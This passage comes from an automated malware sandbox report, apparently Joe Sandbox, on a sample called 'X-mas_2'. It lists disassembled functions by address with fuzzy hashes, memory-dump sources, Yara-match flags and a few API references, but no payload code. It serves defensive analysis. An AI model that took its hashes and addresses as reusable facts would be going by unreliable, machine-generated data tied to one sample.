Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction Fuzzy Hash: 18319AB01483458BC754DF29C861AABBBF1FF86368F104E1CE5D28BA90E378C841DB46

Function 020F5027 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69af3543792a3679bd1ff95531cded08a6264d83709dfc2de3eb879f9d3ec8e
Instruction ID: cfd7a2b62876780899816ce2b714cfb279bc6533505f215dc52407b9923ea535
Opcode Fuzzy Hash: d69af3543792a3679bd1ff95531cded08a6264d83709dfc2de3eb879f9d3ec8e
Instruction Fuzzy Hash: 294123B19483418BD364DF28CC81BABB7E5FFC1364F058A2CE5998BB90E7745841CB86

Function 020F67AF Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4c2c93ed10f3811b026bc799d6341f81262db8b8fdf99b830985bd0e89f5e0
Instruction ID: 27ef3a391481b8c433f995bddcc432613066c79dc770bef171616b300bbe3e0d
Opcode Fuzzy Hash: 7f4c2c93ed10f3811b026bc799d6341f81262db8b8fdf99b830985bd0e89f5e0
Instruction Fuzzy Hash: 4D3149B5A943418BD765CF24C840A6FB7EBBBD6305F1AC97CC142D7654DB369401CB82

Function 004088F0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
Instruction ID: c2a8606713259396baf07b6ed49a93c0e34875c4cdcf46c8cf9c9e6fbb1e3583
Opcode Fuzzy Hash: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
Instruction Fuzzy Hash: F331A773B219114BD310CA29CD447A232929BD8328F3E86B9D865DB7D6DD3BAC0386C0

Function 020E8B57 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
Instruction ID: dcb0e56f70d29b5c79a4f6f179558f011ba1e8a0039ad72805b25cabcd88b5fa
Opcode Fuzzy Hash: 0f5569e20424c6e6f711f9c52c94826b675fcb3f1ccbf41507ebb44b243bad6c
Instruction Fuzzy Hash: E031B673B229114BE754CA29CC4479532D29BD932CF3EC7B8D826DF6D6D937A8438680

Function 0043150E Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
Instruction ID: 6a11e9d41153ba0da39fccc11c07c22ae059f9e64a2284b904e207afa03c6ec2
Opcode Fuzzy Hash: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
Instruction Fuzzy Hash: 97514D11518FC3AEC326CB7C8C48505EF916A6B13074C879DE0F58BBE6D754A162C3E6

Function 02111775 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
Instruction ID: 1442ad3ac132ab74dd435fed73374f217e0832a4188eea7aefdb879fd80df325
Opcode Fuzzy Hash: e79d17c13faec7d708a8099df94850abc110ba9db4c1203296f078210758c6b0
Instruction Fuzzy Hash: F5514B11618FC3AEC3268B3C8C48505EF916E6713074C87ADE1F58BBE6D714A262C3E6

Function 0043E051 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction ID: 2de86218718c271af5024ca1516ac4d3c10d72851b4fdaea6f89b2b7420df16b
Opcode Fuzzy Hash: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction Fuzzy Hash: 6831A977E4032807C32C8D7D9C912A5F552ABC8120F2F833ECCAA97782E8744F0A41C4

Function 0211E2B8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction ID: 8a05822e7921d14c6f714bad2f69af0e95b6216a0a06a1bbe26e950943015d40
Opcode Fuzzy Hash: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction Fuzzy Hash: 42318977E5032907C32C8DBD9C911A5F556ABC9020F2F833ECCAA97786E9744F0946C4

Function 00424F91 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
Instruction ID: 0e1e8af2c2204aea15d5cbc23395958ecdeab842d00133b4e92973e96d65c682
Opcode Fuzzy Hash: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
Instruction Fuzzy Hash: 343168327587284FC3209E7CAD8133A76D2EBD5314F5E163AC8A0D72A2E274CD018ACD

Function 020F59A9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7dec71caf00b9928ba164010d3bbb55a1819cfd031f5c047a8558780cecf4d
Instruction ID: a4a2f45988e04ce74a3d35f5e4404ff8a9c462e8a850fd579f236764b211a2ca
Opcode Fuzzy Hash: 0e7dec71caf00b9928ba164010d3bbb55a1819cfd031f5c047a8558780cecf4d
Instruction Fuzzy Hash: CA312470A943419BE76DCF14CC90F3BB6E2EBAA304F98847CD142D39B5EB709554CA46

Function 0043C440 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
Instruction ID: 8b2346cda91f544e30954989f53522bf0f7333ed1d7757e56fe87add5a417945
Opcode Fuzzy Hash: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
Instruction Fuzzy Hash: 73117B369483089FD7209F50DC90937B7A2EBA9304F04943DE98523311E2369D109746

Function 0211C6A7 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bfc9d4239bec8efa3c349e4119d8c4c3a8a68af5234c458e6846c68253b1043
Instruction ID: 09fd5fa57915fb18498c427b1f1439ba6465afadecc3981b0da45df842a2d966
Opcode Fuzzy Hash: 0bfc9d4239bec8efa3c349e4119d8c4c3a8a68af5234c458e6846c68253b1043
Instruction Fuzzy Hash: FB112B76AC83089FD720AF60ED4197BB7A6DFC5714F09843DE9C553210E37299509793

Function 00415882 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
Instruction ID: 3e731032b9ba81a520a52e62ad974797521f0b7710f777a06b965f9240a14ebe
Opcode Fuzzy Hash: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
Instruction Fuzzy Hash: F8212474A28601CBD71CCF28C8509BBF7A2EBEB300F59947EC043D32A5E938D485C64A

Function 020F7340 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0162c9ebc82eb048be1c24adbd9078571f2fef5b827e1eb5fcf88dae812c937c
Instruction ID: 3c0abe8d83fda725533b8600b0365e00a2637e52990ccc7dc982b60e27ab09fd
Opcode Fuzzy Hash: 0162c9ebc82eb048be1c24adbd9078571f2fef5b827e1eb5fcf88dae812c937c
Instruction Fuzzy Hash: B8210431A983409BE7A5CB24CCC0BABB7E3ABD5344F29897CD58587165DB719442CA07

Function 02106E92 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ed20b38315a0e653c5c517d3e5591ccba041f23722c940e82717d76878ccee4
Instruction ID: 6a141ec361df0f443603601e59431a34c5cd8f95e4be1b9c11ab4ac942237c67
Opcode Fuzzy Hash: 0ed20b38315a0e653c5c517d3e5591ccba041f23722c940e82717d76878ccee4
Instruction Fuzzy Hash: 0221C1B06593D4CAD7348F58C4627BBB2B1FF82301F04A85DD0C69BBA4EBB88501C75A

Function 020F4615 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d2dcd78d10fe1d542c286112e630181c60e289363575733170102aefe0cc75f
Instruction ID: 8b6413d8ad92896f115575731cd23d8b76db860aea554c9dc707d65464179cab
Opcode Fuzzy Hash: 2d2dcd78d10fe1d542c286112e630181c60e289363575733170102aefe0cc75f
Instruction Fuzzy Hash: 6111C2749583919BD385DF19D840A3B73E1EB86305F16982CEAC6E7951E330A811EB4A

Function 02119348 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13165a97949a53cd68bdd7990c1a88daa5d4e1d3d92c45451d501b6e22855da4
Instruction ID: e5be311d50fc59c910181882ecc0b57cb95b292adf271574a1d1dfeb03a2a253
Opcode Fuzzy Hash: 13165a97949a53cd68bdd7990c1a88daa5d4e1d3d92c45451d501b6e22855da4
Instruction Fuzzy Hash: 32113675A981405BE7108F28CC80B3FB2E3EBC5300F29C434E291972D4DB74D8418A13

Function 00435410 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 68b9c81565d08f8e27d3b5cdfdde0d7ccd40a41e6fcafbbcd0beb1d44a1560b9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 06112933A045D40EC31A8D3C8400665BFE30AB7236F5D939AF4B89B2D2D6268DCA8759

Function 02115677 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: c5175b2e81064dd20a8eb0822e501253c5e3da99771b0918fea5cdec9045191b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 0A11C233A451D00EC3168D3C84105A5BFA30AE3134B9983A9E4B89B2D2D737898AC7D5

Function 00429A90 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
Instruction ID: 0869e638d739f0c9dc1f77a8d382a8f2a9bb23b5c0a6dc3e537d6bd1b3fecd10
Opcode Fuzzy Hash: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
Instruction Fuzzy Hash: 4B01B5F1B0136147D720DE55F4C1B27B2A9AF85708F58043ED40957342DBBAFC08C299

Function 021071D6 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c4b36911ac8907ef1b102545c2b83b35f126a6b8ff2669a2dc623a6d0d22d4
Instruction ID: 87a97996bf77aa872f620d9255465ab0f361468384b600f19c2d0337894d51a8
Opcode Fuzzy Hash: e9c4b36911ac8907ef1b102545c2b83b35f126a6b8ff2669a2dc623a6d0d22d4
Instruction Fuzzy Hash: 06014EB5A581509BE7148B089C8063EB3F6BB86300F59547CC086677D1DB71AC52CF8A

Function 0042C0CD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
Instruction ID: d899a92072081549aacd0a373389c60e53af17a8a0474f1d80352f716c791a12
Opcode Fuzzy Hash: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
Instruction Fuzzy Hash: 98012821B0D7608BD319CB69A49132BFBD2DBEA704F18985ED0DBD7310D928CD02479E

Function 0043E19A Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
Instruction ID: 571c051b1a7b4a12d511d6b327af5e60c1d357793d73ac2cbf614903c133d6ad
Opcode Fuzzy Hash: a4891f18ca3c17b38bf2b15199dfd40243cf34308cd727dcd2b612a98463f970
Instruction Fuzzy Hash: 1001D8756592508BE3084F96E49077B73A9EB8F301F19783EC481576C2C3389C128B4F

Function 0211A171 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478d90f158bff90e3ed6499d358409929b89771177461e1ff75e0f15777ef0d5
Instruction ID: 9cdf5f2a9010a2c3f8561caa35dcfced48bd7da0af99c83416574806b309c615
Opcode Fuzzy Hash: 478d90f158bff90e3ed6499d358409929b89771177461e1ff75e0f15777ef0d5
Instruction Fuzzy Hash: 0A01B126A5836197C3288F19C49062BF7E2BFC2322F09D93DA4D853245DB38C801D746

Function 00402B60 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
Instruction ID: b2d8b3f25d2a6363043d8991c3fea2fcaa9534d5848f355d0d58bc03b07a957b
Opcode Fuzzy Hash: 8f638a3506d36bf050616cf4e3f80a7ef195994cbd757f6b5d36e659fde1be3a
Instruction Fuzzy Hash: 9BF0286A76830A0BD310DDFAADC456BB3E1D7D5214F194539E940E3341E4F8F80681A8

Function 0043DFB3 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction ID: 7c963995ffd6ab337d9a695198e0a5d7bcf509792ecc366c678e3cf94aa25ffd
Opcode Fuzzy Hash: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction Fuzzy Hash: 3101443A3946018FD70CDF28E8A16FAB7A6E786300F0D543DC482C3221EA38E911C648

Function 0211E21A Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction ID: c127a7f01ca12f1d7f72638bd82b620d47ffa4aee801e8924910afc1e5318224
Opcode Fuzzy Hash: 6715dbe9d135ac45bdbd9ac448563beeb8c9300e3d08683238c916d7afe545dc
Instruction Fuzzy Hash: 1C01443A3946018FD30CDF68E8B1AFAB7A6E782300F0D543DC482C3221EA38E901C708

Function 021078BE Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13cc83167980fe97b378c811311f675f4a72e884837bed22e86a8075372e7dad
Instruction ID: 42db1f4225a3990267d6d1ea81e83ac85f6e185f6e3f4fae0580772b5e28892c
Opcode Fuzzy Hash: 13cc83167980fe97b378c811311f675f4a72e884837bed22e86a8075372e7dad
Instruction Fuzzy Hash: 19018FB1A587009FE728CF34CC51B6AB7E5AB85700F10482DB195D22A0E771D5048F56

Function 00420BD3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
Instruction ID: df34008647d778bb7c521eae4ddccb3a733cd5fde321c9630a51ec9e0fc568b0
Opcode Fuzzy Hash: 2b88062f56769bb86136e5b0f9c197fa5aab20b91b17b8cecccb4b899e00228a
Instruction Fuzzy Hash: 2BB092E9C0B41086D015AB11BC024ABB0268913348F1424BAE80632282AA6AEA1E40DF

Function 02100E3A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d3b876887d895f7ba3aee35bb48c7d36c3c3e2d4f2f6651521185b0c751699
Instruction ID: c0f8b9315cba8bb20c096b56388bd9f1b3041abb1bc360c546cf9885e5b69217
Opcode Fuzzy Hash: 89d3b876887d895f7ba3aee35bb48c7d36c3c3e2d4f2f6651521185b0c751699
Instruction Fuzzy Hash: E2B092E9C026548A9855AB102C014EBB02A4D13300F04A4B0C81736220AA17D25A589F

Function 0043D818 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction ID: 86aa6f376ae128fac203354b731e992d447e72622e96fa66a5b9d7e17052ec8c
Opcode Fuzzy Hash: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction Fuzzy Hash: A7B09228AAC050C7920CCF24D8909B2B2BBDB87608A14B268D04B23226D220E802970C

Function 0211DA7F Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction ID: 86aa6f376ae128fac203354b731e992d447e72622e96fa66a5b9d7e17052ec8c
Opcode Fuzzy Hash: 7b620c91a42edb0786d309cbcea9fd596892cbdb30a322ebafa140b7a14dfef1
Instruction Fuzzy Hash: A7B09228AAC050C7920CCF24D8909B2B2BBDB87608A14B268D04B23226D220E802970C

Function 02112232 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 100COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0211223F
VariantInit.OLEAUT32 ref: 0211224B

Strings

x, xrefs: 02112267
f, xrefs: 0211228F
d, xrefs: 02112297
h, xrefs: 021122A7
|, xrefs: 02112277
~, xrefs: 0211226F
j, xrefs: 0211229F
p=)u, xrefs: 0211224B
b, xrefs: 0211227F
l, xrefs: 021122B7
n, xrefs: 021122AF
`, xrefs: 02112287

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$p=)u$x$|$~
API String ID: 2610073882-65970700
Opcode ID: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction ID: a8e22bca7be9104c1fdd307f0e6b09062cb5f102cccdf0bb2bb9def44d5be248
Opcode Fuzzy Hash: 1ace8412bc45bfffb96bd3be78b6ed24615df238187204af6596b75391cea6f0
Instruction Fuzzy Hash: 12411860208B818FD725CF3CC894316BFE2AB56224F08869CE8E58F3DAC775D515C766

Function 004321FB Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 105COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00432204
VariantInit.OLEAUT32 ref: 00432210

Strings

n, xrefs: 0043226E
l, xrefs: 00432276
f, xrefs: 0043224E
h, xrefs: 00432266
b, xrefs: 0043223E
x, xrefs: 00432226
d, xrefs: 00432256
`, xrefs: 00432246
j, xrefs: 0043225E
|, xrefs: 00432236
~, xrefs: 0043222E

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
Instruction ID: b79967f44f2bd9de6c2e39eb15a986492cae5a4b6d791275bc0e3f4af17e2b78
Opcode Fuzzy Hash: d56210b6122cd0a81d0aed4da15e1541f510ecdfe567a2f287f30a5ea68c2328
